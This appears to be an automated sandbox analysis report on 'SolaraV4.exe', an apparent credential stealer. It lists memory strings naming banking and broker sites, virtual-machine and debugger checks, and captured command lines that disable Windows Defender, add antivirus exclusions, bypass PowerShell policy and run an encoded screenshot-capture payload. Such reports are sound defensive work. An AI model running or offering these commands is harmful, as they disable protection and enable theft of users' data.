Source: SolaraV4.exe, 00000003.00000003.2819493322.0000024133FCA000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Canara Transaction PasswordVMware20,11696508427x
Source: SolaraV4.exe, 00000003.00000003.2819493322.0000024133FCA000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: ms.portal.azure.comVMware20,11696508427
Source: SolaraV4.exe, 00000003.00000003.2819493322.0000024133FCA000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Canara Transaction PasswordVMware20,11696508427}
Source: getmac.exe, 00000050.00000002.2658681737.000001E2C98B3000.00000004.00000020.00020000.00000000.sdmp, getmac.exe, 00000050.00000003.2657356233.000001E2C989E000.00000004.00000020.00020000.00000000.sdmp, getmac.exe, 00000050.00000003.2657016864.000001E2C988A000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: "SYSTEM\CurrentControlSet\Services\Hyper-V\Linkage"
Source: SolaraV4.exe, 00000003.00000003.2819493322.0000024133FCA000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: outlook.office365.comVMware20,11696508427t
Source: svchost.exe, 0000001C.00000002.3722373698.000001984C82B000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000001C.00000002.3724833683.0000019852054000.00000004.00000020.00020000.00000000.sdmp, SIHClient.exe, 00000045.00000003.3048680197.00000270AE649000.00000004.00000020.00020000.00000000.sdmp, SIHClient.exe, 00000045.00000003.3048283576.00000270AE649000.00000004.00000020.00020000.00000000.sdmp, SIHClient.exe, 00000045.00000003.2668582901.00000270AE649000.00000004.00000020.00020000.00000000.sdmp, SIHClient.exe, 00000045.00000002.3052583503.00000270AE649000.00000004.00000020.00020000.00000000.sdmp, SIHClient.exe, 00000045.00000003.3050867328.00000270AE649000.00000004.00000020.00020000.00000000.sdmp, SIHClient.exe, 00000045.00000003.2672453963.00000270AE649000.00000004.00000020.00020000.00000000.sdmp, getmac.exe, 00000050.00000002.2658681737.000001E2C98B3000.00000004.00000020.00020000.00000000.sdmp, getmac.exe, 00000050.00000003.2657356233.000001E2C989E000.00000004.00000020.00020000.00000000.sdmp, getmac.exe, 00000050.00000003.2657016864.000001E2C988A000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Hyper-V RAW
Source: SolaraV4.exe, 00000003.00000002.2974193857.0000024132D70000.00000004.00001000.00020000.00000000.sdmp Binary or memory string: vmsrvc
Source: SolaraV4.exe, 00000003.00000003.2819493322.0000024133FCA000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: secure.bankofamerica.comVMware20,11696508427|UE
Source: SolaraV4.exe, 00000003.00000003.2819493322.0000024133FCA000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Interactive Brokers - EU WestVMware20,11696508427n
Source: SolaraV4.exe, 00000003.00000003.2819493322.0000024133FCA000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: microsoft.visualstudio.comVMware20,11696508427x
Source: SolaraV4.exe, 00000003.00000003.2819493322.0000024133FCA000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: www.interactivebrokers.co.inVMware20,11696508427~
Source: SIHClient.exe, 00000045.00000002.3052583503.00000270AE5F6000.00000004.00000020.00020000.00000000.sdmp, SIHClient.exe, 00000045.00000003.3050867328.00000270AE5F6000.00000004.00000020.00020000.00000000.sdmp, SIHClient.exe, 00000045.00000003.2669455077.00000270AE5F9000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Hyper-V RAW@:e
Source: SolaraV4.exe, 00000003.00000003.2492379018.0000024132FF2000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: vmsrvcZ
Source: SolaraV4.exe, 00000003.00000003.2819493322.0000024133FCA000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Canara Change Transaction PasswordVMware20,11696508427^
Source: SolaraV4.exe, 00000003.00000003.2819493322.0000024133FCA000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: www.interactivebrokers.comVMware20,11696508427}
Source: SolaraV4.exe, 00000003.00000003.2819493322.0000024133FCA000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: trackpan.utiitsl.comVMware20,11696508427h
Source: SolaraV4.exe, 00000003.00000003.2819493322.0000024133FCA000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Interactive Brokers - NDCDYNVMware20,11696508427z
Source: SolaraV4.exe, 00000003.00000002.2974193857.0000024132D70000.00000004.00001000.00020000.00000000.sdmp Binary or memory string: qemu-ga
Source: SolaraV4.exe, 00000003.00000003.2819493322.0000024133FCA000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: global block list test formVMware20,11696508427
Source: SolaraV4.exe, 00000003.00000002.2974193857.0000024132D70000.00000004.00001000.00020000.00000000.sdmp Binary or memory string: vmware
Source: SolaraV4.exe, 00000003.00000003.2819493322.0000024133FCA000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Interactive Brokers - EU East & CentralVMware20,11696508427
Source: SolaraV4.exe, 00000003.00000002.2974193857.0000024132D70000.00000004.00001000.00020000.00000000.sdmp Binary or memory string: vmusrvc
Source: SolaraV4.exe, 00000003.00000003.2819493322.0000024133FCA000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: dev.azure.comVMware20,11696508427j
Source: SolaraV4.exe, 00000003.00000003.2491764058.0000024132FE8000.00000004.00000020.00020000.00000000.sdmp, SolaraV4.exe, 00000003.00000003.2492379018.0000024132FF2000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: vmusrvcZ
Source: SolaraV4.exe, 00000003.00000003.2819493322.0000024133FCA000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Interactive Brokers - COM.HKVMware20,11696508427
Source: SolaraV4.exe, 00000003.00000003.2819493322.0000024133FCA000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Canara Change Transaction PasswordVMware20,11696508427
Source: SolaraV4.exe, 00000003.00000003.2496514190.0000024132E88000.00000004.00000020.00020000.00000000.sdmp, SolaraV4.exe, 00000003.00000003.2668174875.0000024132E80000.00000004.00000020.00020000.00000000.sdmp, SolaraV4.exe, 00000003.00000002.2974439569.0000024132E80000.00000004.00000020.00020000.00000000.sdmp, SolaraV4.exe, 00000003.00000003.2658597789.0000024132E80000.00000004.00000020.00020000.00000000.sdmp, SolaraV4.exe, 00000003.00000003.2967612000.0000024132E7E000.00000004.00000020.00020000.00000000.sdmp, SolaraV4.exe, 00000003.00000003.2679350163.0000024132E80000.00000004.00000020.00020000.00000000.sdmp, SolaraV4.exe, 00000003.00000003.2677235249.0000024132E7F000.00000004.00000020.00020000.00000000.sdmp, SolaraV4.exe, 00000003.00000003.2660879553.0000024132E80000.00000004.00000020.00020000.00000000.sdmp, SolaraV4.exe, 00000003.00000003.2637075073.0000024132E80000.00000004.00000020.00020000.00000000.sdmp, SolaraV4.exe, 00000003.00000003.2821702107.0000024132E80000.00000004.00000020.00020000.00000000.sdmp, SolaraV4.exe, 00000003.00000003.2614558332.0000024132E7F000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Hyper-V RAW}
Source: SolaraV4.exe, 00000003.00000002.2974193857.0000024132D70000.00000004.00001000.00020000.00000000.sdmp Binary or memory string: vmwareservice
Source: SolaraV4.exe, 00000003.00000003.2492379018.0000024132FF2000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: vmwareservicer6
Source: SolaraV4.exe, 00000003.00000003.2819493322.0000024133FCA000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Interactive Brokers - non-EU EuropeVMware20,11696508427
Source: SolaraV4.exe, 00000003.00000002.2974193857.0000024132D70000.00000004.00001000.00020000.00000000.sdmp Binary or memory string: vmwareuser
Source: SolaraV4.exe, 00000003.00000003.2819493322.0000024133FCA000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: account.microsoft.com/profileVMware20,11696508427u
Source: SolaraV4.exe, 00000003.00000003.2819493322.0000024133FCA000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: interactivebrokers.co.inVMware20,11696508427d
Source: getmac.exe, 00000050.00000003.2657356233.000001E2C989E000.00000004.00000020.00020000.00000000.sdmp, getmac.exe, 00000050.00000003.2657016864.000001E2C988A000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: SetPropValue.sSubKeyName("SYSTEM\CurrentControlSet\Services\Hyper-V\Linkage");
Source: SolaraV4.exe, 00000003.00000003.2492379018.0000024132FF2000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: vboxserviceZ
Source: SolaraV4.exe, 00000003.00000003.2819493322.0000024133FCA000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Test URL for global passwords blocklistVMware20,11696508427
Source: SolaraV4.exe, 00000003.00000003.2819493322.0000024133FCA000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Interactive Brokers - GDCDYNVMware20,11696508427p
Source: SolaraV4.exe, 00000003.00000002.2974193857.0000024132D70000.00000004.00001000.00020000.00000000.sdmp Binary or memory string: vmwaretray
Source: SolaraV4.exe, 00000003.00000003.2492379018.0000024132FF2000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: vmwareservicer6Z
Source: SolaraV4.exe, 00000003.00000003.2649768590.00000241333A4000.00000004.00000020.00020000.00000000.sdmp, SolaraV4.exe, 00000003.00000003.2661241266.0000024133495000.00000004.00000020.00020000.00000000.sdmp, SolaraV4.exe, 00000003.00000003.2659321131.0000024133495000.00000004.00000020.00020000.00000000.sdmp, SolaraV4.exe, 00000003.00000003.2676202946.0000024133496000.00000004.00000020.00020000.00000000.sdmp, SolaraV4.exe, 00000003.00000003.2677512782.00000241333A0000.00000004.00000020.00020000.00000000.sdmp, SolaraV4.exe, 00000003.00000003.2652473109.0000024133495000.00000004.00000020.00020000.00000000.sdmp, SolaraV4.exe, 00000003.00000003.2669072153.00000241333A0000.00000004.00000020.00020000.00000000.sdmp, SolaraV4.exe, 00000003.00000003.2680559821.0000024133496000.00000004.00000020.00020000.00000000.sdmp, SolaraV4.exe, 00000003.00000002.2975881407.0000024133496000.00000004.00000020.00020000.00000000.sdmp, SolaraV4.exe, 00000003.00000003.2667572922.0000024133496000.00000004.00000020.00020000.00000000.sdmp, SolaraV4.exe, 00000003.00000003.2820630288.0000024133496000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Hyper-V Requirements: VM Monitor Mode Extensions: No
Source: SolaraV4.exe, 00000003.00000003.2819493322.0000024133FCA000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: tasks.office.comVMware20,11696508427o
Source: getmac.exe, 00000050.00000002.2658681737.000001E2C98B3000.00000004.00000020.00020000.00000000.sdmp, getmac.exe, 00000050.00000003.2657356233.000001E2C989E000.00000004.00000020.00020000.00000000.sdmp, getmac.exe, 00000050.00000003.2657016864.000001E2C988A000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Win32_NetworkProtocolHyper-V RAWHyper-VRAWHyper-V RAWRoot%\system32\d'|Y
Source: SolaraV4.exe, 00000003.00000002.2974193857.0000024132D70000.00000004.00001000.00020000.00000000.sdmp Binary or memory string: vboxtray
Source: getmac.exe, 00000050.00000002.2658681737.000001E2C98D2000.00000004.00000020.00020000.00000000.sdmp, getmac.exe, 00000050.00000003.2657313901.000001E2C98CF000.00000004.00000020.00020000.00000000.sdmp, getmac.exe, 00000050.00000003.2657016864.000001E2C988A000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: __PARAMETERSSYSTEM\CurrentControlSet\Services\Hyper-V\LinkageExport
Source: SolaraV4.exe, 00000003.00000003.2492379018.0000024132FF2000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: vmwareuserZ
Source: getmac.exe, 00000050.00000003.2657356233.000001E2C989E000.00000004.00000020.00020000.00000000.sdmp, getmac.exe, 00000050.00000003.2657016864.000001E2C988A000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Hyper-VY
Source: SolaraV4.exe, 00000003.00000003.2491764058.0000024132FE8000.00000004.00000020.00020000.00000000.sdmp, SolaraV4.exe, 00000003.00000003.2492379018.0000024132FF2000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: qemu-gaZ
Source: getmac.exe, 00000050.00000002.2658681737.000001E2C98D2000.00000004.00000020.00020000.00000000.sdmp, getmac.exe, 00000050.00000003.2657313901.000001E2C98CF000.00000004.00000020.00020000.00000000.sdmp, getmac.exe, 00000050.00000003.2657016864.000001E2C988A000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: SYSTEM\CurrentControlSet\Services\Hyper-V\Linkage
Source: SolaraV4.exe, 00000003.00000003.2819493322.0000024133FCA000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: bankofamerica.comVMware20,11696508427x
Source: SolaraV4.exe, 00000003.00000003.2492379018.0000024132FF2000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: vmtoolsd
Source: SolaraV4.exe, 00000003.00000003.2492379018.0000024132FF2000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: vmwarec
Source: SolaraV4.exe, 00000003.00000003.2819493322.0000024133FCA000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Interactive Brokers - HKVMware20,11696508427]
Source: SolaraV4.exe, 00000003.00000003.2819493322.0000024133FCA000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: turbotax.intuit.comVMware20,11696508427t
Source: SolaraV4.exe, 00000003.00000003.2492379018.0000024132FF2000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: vmwaretrayZ
Source: SolaraV4.exe, 00000003.00000003.2819493322.0000024133FCA000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: AMC password management pageVMware20,11696508427
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information queried: ProcessInformation Jump to behavior
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Source: C:\Users\user\Desktop\SolaraV4.exe Code function: 1_2_00007FF6FFC5D12C IsProcessorFeaturePresent,RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter, 1_2_00007FF6FFC5D12C
Contains functionality to dynamically determine API calls
Source: C:\Users\user\Desktop\SolaraV4.exe Code function: 3_2_00007FFE75E502A0 EntryPoint,LoadLibraryA,GetProcAddress,VirtualProtect,VirtualProtect,VirtualProtect, 3_2_00007FFE75E502A0
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Source: C:\Users\user\Desktop\SolaraV4.exe Code function: 1_2_00007FF6FFC73480 GetProcessHeap, 1_2_00007FF6FFC73480
Enables debug privileges
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process token adjusted: Debug Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process token adjusted: Debug Jump to behavior
Source: C:\Windows\System32\tasklist.exe Process token adjusted: Debug
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process token adjusted: Debug
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process token adjusted: Debug
Source: C:\Windows\System32\tasklist.exe Process token adjusted: Debug
Source: C:\Windows\System32\tasklist.exe Process token adjusted: Debug
Source: C:\Windows\System32\tasklist.exe Process token adjusted: Debug
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process token adjusted: Debug
Source: C:\Windows\System32\tasklist.exe Process token adjusted: Debug
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process token adjusted: Debug
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process token adjusted: Debug
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process token adjusted: Debug
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process token adjusted: Debug
Source: C:\Users\user\Desktop\SolaraV4.exe Code function: 1_2_00007FF6FFC5D12C IsProcessorFeaturePresent,RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter, 1_2_00007FF6FFC5D12C
Source: C:\Users\user\Desktop\SolaraV4.exe Code function: 1_2_00007FF6FFC5C8A0 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess, 1_2_00007FF6FFC5C8A0
Source: C:\Users\user\Desktop\SolaraV4.exe Code function: 1_2_00007FF6FFC6A614 RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter, 1_2_00007FF6FFC6A614
Source: C:\Users\user\Desktop\SolaraV4.exe Code function: 1_2_00007FF6FFC5D30C SetUnhandledExceptionFilter, 1_2_00007FF6FFC5D30C
Source: C:\Users\user\Desktop\SolaraV4.exe Code function: 3_2_00007FF6FFC5D12C IsProcessorFeaturePresent,RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter, 3_2_00007FF6FFC5D12C
Source: C:\Users\user\Desktop\SolaraV4.exe Code function: 3_2_00007FF6FFC5C8A0 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess, 3_2_00007FF6FFC5C8A0
Source: C:\Users\user\Desktop\SolaraV4.exe Code function: 3_2_00007FF6FFC6A614 RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter, 3_2_00007FF6FFC6A614
Source: C:\Users\user\Desktop\SolaraV4.exe Code function: 3_2_00007FF6FFC5D30C SetUnhandledExceptionFilter, 3_2_00007FF6FFC5D30C
Source: C:\Users\user\Desktop\SolaraV4.exe Code function: 3_2_00007FFE75C83068 IsProcessorFeaturePresent,00007FFE957D19A0,RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,00007FFE957D19A0,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter, 3_2_00007FFE75C83068
Source: C:\Users\user\Desktop\SolaraV4.exe Code function: 3_2_00007FFE75DA2004 IsProcessorFeaturePresent,RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter, 3_2_00007FFE75DA2004
Source: C:\Users\user\AppData\Local\Temp\_MEI71122\rar.exe Code function: 108_2_00007FF7C723A66C SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess, 108_2_00007FF7C723A66C
Source: C:\Users\user\AppData\Local\Temp\_MEI71122\rar.exe Code function: 108_2_00007FF7C723B6D8 SetUnhandledExceptionFilter, 108_2_00007FF7C723B6D8
Source: C:\Users\user\AppData\Local\Temp\_MEI71122\rar.exe Code function: 108_2_00007FF7C723B52C IsProcessorFeaturePresent,RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter, 108_2_00007FF7C723B52C
Source: C:\Users\user\AppData\Local\Temp\_MEI71122\rar.exe Code function: 108_2_00007FF7C7244C10 RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter, 108_2_00007FF7C7244C10

HIPS / PFW / Operating System Protection Evasion
barindex
Adds a directory exclusion to Windows Defender
Source: C:\Users\user\Desktop\SolaraV4.exe Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\user\Desktop\SolaraV4.exe'"
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\user\Desktop\SolaraV4.exe'
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -Command Add-MpPreference -ExclusionPath 'C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp\ .scr'
Source: C:\Users\user\Desktop\SolaraV4.exe Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\user\Desktop\SolaraV4.exe'" Jump to behavior
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\user\Desktop\SolaraV4.exe' Jump to behavior
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -Command Add-MpPreference -ExclusionPath 'C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp\ .scr'
Bypasses PowerShell execution policy
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe -NoProfile -ExecutionPolicy Bypass -EncodedCommand JABzAG8AdQByAGMAZQAgAD0AIABAACIADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtADsADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtAC4AQwBvAGwAbABlAGMAdABpAG8AbgBzAC4ARwBlAG4AZQByAGkAYwA7AA0ACgB1AHMAaQBuAGcAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcAOwANAAoAdQBzAGkAbgBnACAAUwB5AHMAdABlAG0ALgBXAGkAbgBkAG8AdwBzAC4ARgBvAHIAbQBzADsADQAKAA0ACgBwAHUAYgBsAGkAYwAgAGMAbABhAHMAcwAgAFMAYwByAGUAZQBuAHMAaABvAHQADQAKAHsADQAKACAAIAAgACAAcAB1AGIAbABpAGMAIABzAHQAYQB0AGkAYwAgAEwAaQBzAHQAPABCAGkAdABtAGEAcAA+ACAAQwBhAHAAdAB1AHIAZQBTAGMAcgBlAGUAbgBzACgAKQANAAoAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAdgBhAHIAIAByAGUAcwB1AGwAdABzACAAPQAgAG4AZQB3ACAATABpAHMAdAA8AEIAaQB0AG0AYQBwAD4AKAApADsADQAKACAAIAAgACAAIAAgACAAIAB2AGEAcgAgAGEAbABsAFMAYwByAGUAZQBuAHMAIAA9ACAAUwBjAHIAZQBlAG4ALgBBAGwAbABTAGMAcgBlAGUAbgBzADsADQAKAA0ACgAgACAAIAAgACAAIAAgACAAZgBvAHIAZQBhAGMAaAAgACgAUwBjAHIAZQBlAG4AIABzAGMAcgBlAGUAbgAgAGkAbgAgAGEAbABsAFMAYwByAGUAZQBuAHMAKQANAAoAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHQAcgB5AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAFIAZQBjAHQAYQBuAGcAbABlACAAYgBvAHUAbgBkAHMAIAA9ACAAcwBjAHIAZQBlAG4ALgBCAG8AdQBuAGQAcwA7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHUAcwBpAG4AZwAgACgAQgBpAHQAbQBhAHAAIABiAGkAdABtAGEAcAAgAD0AIABuAGUAdwAgAEIAaQB0AG0AYQBwACgAYgBvAHUAbgBkAHMALgBXAGkAZAB0AGgALAAgAGIAbwB1AG4AZABzAC4ASABlAGkAZwBoAHQAKQApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAB1AHMAaQBuAGcAIAAoAEcAcgBhAHAAaABpAGMAcwAgAGcAcgBhAHAAaABpAGMAcwAgAD0AIABHAHIAYQBwAGgAaQBjAHMALgBGAHIAbwBtAEkAbQBhAGcAZQAoAGIAaQB0AG0AYQBwACkAKQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAGcAcgBhAHAAaABpAGMAcwAuAEMAbwBwAHkARgByAG8AbQBTAGMAcgBlAGUAbgAoAG4AZQB3ACAAUABvAGkAbgB0ACgAYgBvAHUAbgBkAHMALgBMAGUAZgB0ACwAIABiAG8AdQBuAGQAcwAuAFQAbwBwACkALAAgAFAAbwBpAG4AdAAuAEUAbQBwAHQAeQAsACAAYgBvAHUAbgBkAHMALgBTAGkAegBlACkAOwANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAcgBlAHMAdQBsAHQAcwAuAEEAZABkACgAKABCAGkAdABtAGEAcAApAGIAaQB0AG0AYQBwAC4AQwBsAG8AbgBlACgAKQApADsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAYwBhAHQAYwBoACAAKABFAHgAYwBlAHAAdABpAG8AbgApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAC8ALwAgAEgAYQBuAGQAbABlACAAYQBuAHkAIABlAHgAYwBlAHAAdABpAG8AbgBzACAAaABlAHIAZQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAcgBlAHQAdQByAG4AIAByAGUAcwB1AGwAdABzADsADQAKACAAIAAgACAAfQANAAoAfQANAAoAIgBAAA0ACgANAAoAQQBkAGQALQBUAHkAcABlACAALQBUAHkAcABlAEQAZQBmAGkAbgBpAHQAaQBvAG4AIAAkAHMAbwB1AHIAYwBlACAALQBSAGUAZgBlAHIAZQBuAGMAZQBkAEEAcwBzAGUAbQBiAGwAaQBlAHMAIAB
Encrypted powershell cmdline option found
Source: C:\Windows\System32\cmd.exe Process created: Base64 decoded $source = @"using System;using System.Collections.Generic;using System.Drawing;using System.Windows.Forms;public class Screenshot{ public static List<Bitmap> CaptureScreens() { var results = new List<Bitmap>(); var allScreens = Screen.AllScreens; foreach (Screen screen in allScreens) { try { Rectangle bounds = screen.Bounds; using (Bitmap bitmap = new Bitmap(bounds.Width, bounds.Height)) { using (Graphics graphics = Graphics.FromImage(bitmap)) { graphics.CopyFromScreen(new Point(bounds.Left, bounds.Top), Point.Empty, bounds.Size); } results.Add((Bitmap)bitmap.Clone()); } } catch (Exception) { // Handle any exceptions here } } return results; }}"@Add-Type -TypeDefinition $source -ReferencedAssemblies System.Drawing, System.Windows.Forms$screenshots = [Screenshot]::CaptureScreens()for ($i = 0; $i -lt $screenshots.Count; $i++){ $screenshot = $screenshots[$i] $screenshot.Save("./Display ($($i+1)).png") $screenshot.Dispose()}
Source: C:\Windows\System32\cmd.exe Process created: Base64 decoded $source = @"using System;using System.Collections.Generic;using System.Drawing;using System.Windows.Forms;public class Screenshot{ public static List<Bitmap> CaptureScreens() { var results = new List<Bitmap>(); var allScreens = Screen.AllScreens; foreach (Screen screen in allScreens) { try { Rectangle bounds = screen.Bounds; using (Bitmap bitmap = new Bitmap(bounds.Width, bounds.Height)) { using (Graphics graphics = Graphics.FromImage(bitmap)) { graphics.CopyFromScreen(new Point(bounds.Left, bounds.Top), Point.Empty, bounds.Size); } results.Add((Bitmap)bitmap.Clone()); } } catch (Exception) { // Handle any exceptions here } } return results; }}"@Add-Type -TypeDefinition $source -ReferencedAssemblies System.Drawing, System.Windows.Forms$screenshots = [Screenshot]::CaptureScreens()for ($i = 0; $i -lt $screenshots.Count; $i++){ $screenshot = $screenshots[$i] $screenshot.Save("./Display ($($i+1)).png") $screenshot.Dispose()}
Modifies Windows Defender protection settings
Source: C:\Users\user\Desktop\SolaraV4.exe Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend && powershell Set-MpPreference -SubmitSamplesConsent 2 & "%ProgramFiles%\Windows Defender\MpCmdRun.exe" -RemoveDefinitions -All"
Source: C:\Users\user\Desktop\SolaraV4.exe Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend && powershell Set-MpPreference -SubmitSamplesConsent 2 & "%ProgramFiles%\Windows Defender\MpCmdRun.exe" -RemoveDefinitions -All"
Source: C:\Users\user\Desktop\SolaraV4.exe Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend && powershell Set-MpPreference -SubmitSamplesConsent 2 & "%ProgramFiles%\Windows Defender\MpCmdRun.exe" -RemoveDefinitions -All"
